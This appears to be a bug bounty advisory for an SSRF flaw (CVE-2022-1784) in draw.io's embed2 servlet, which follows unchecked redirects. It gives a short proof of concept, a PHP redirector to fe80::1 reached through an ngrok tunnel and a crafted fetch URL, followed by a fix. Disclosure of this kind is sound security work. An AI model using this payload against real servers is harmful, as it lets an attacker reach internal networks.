Lucene search
HaxatronD1330CE8-CCCB-4BAE-B9A9-A03B97F444A5HistoryMay 18, 2022 - 3:08 a.m.
SSRF in embed2 servlet via redirects
2022-05-1803:08:11
haxatron
www.huntr.dev
61
ssrf
embed2servlet
openconnection
redirection
vulnerability
bugbounty
EPSS
0.001
Percentile
51.0%
Description
Embed2Servlet uses url.OpenConnection() in https://github.com/jgraph/drawio/blob/7a68ebe22a64fe722704e9c4527791209fee2034/src/main/java/com/mxgraph/online/EmbedServlet2.java#L400 which follows redirects by default. However, the redirections are not being checked, hence it is possible to perform SSRF this way.
Proof of Concept
1: Start a redirector (redirect.php) and an ngrok server
<?php
header("Location: http://[fe80::1]");
ngrok http 80
2: Hit your ngrok server to redirect and see response go to fe80::1
https://[DIAGRAMS-SERVER]/embed2.js?fetch=http://[NGROK-ID].ngrok.io/redirect.php
Recommended Fix
setInstanceFollowRedirects to false in url.openConnection() in Embed2Servlet
Related
prion
prion
Server side request forgery (ssrf)
2022-05-20 13:15:00
cvelist
cvelist
CVE-2022-1784 Server-Side Request Forgery (SSRF) in jgraph/drawio
2022-05-20 12:15:11
osv
osv
CVE-2022-1784
2022-05-20 13:15:13
nvd
nvd
CVE-2022-1784
2022-05-20 13:15:13
cve
cve
CVE-2022-1784
2022-05-20 13:15:13